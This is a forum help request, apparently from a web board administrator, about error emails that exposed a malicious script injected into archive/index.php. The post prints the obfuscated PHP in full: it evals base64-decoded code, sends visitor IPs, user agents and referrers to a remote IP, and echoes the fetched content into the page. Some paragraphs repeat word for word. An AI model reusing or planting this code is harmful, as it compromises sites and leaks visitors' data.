2011-10-12, 10:24 AM
today i got bulk error email from my board
and in the same file i found a suspicious script
i found there is lot of error like in google
http://www.google.co.in/search?gcx=c&sou...196.216.30
i reset cpanel,mysql password since i feel its like script injection ?
can any one more about this ?
i think someone has injected malicious script in php file
and there is similar page in http://community.mybb.com/thread-105586.html
saying Your copy of ****** (http://www.*****.com) has experienced an error. Details of the error include:
---
Type: 2
File: archive/index.php (Line no. 506)
Message
file_get_contents(http://91.196.216.30/bt.php?ip=173.245.49.72&host=www.seminarprojects.com&uri=%2Farchive%2Findex.php%2Fforum-22.html&ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%3B+rv%3A1.9.1.5%29+gecko%2F20091102+firefox%2F3.5.5&ref=http%3A%2F%2Fwww.seminarprojects.com%2Farchive%2Findex.php) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
and in the same file i found a suspicious script
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
i found there is lot of error like in google
http://www.google.co.in/search?gcx=c&sou...196.216.30
i reset cpanel,mysql password since i feel its like script injection ?
can any one more about this ?
i think someone has injected malicious script in php file
and there is similar page in http://community.mybb.com/thread-105586.html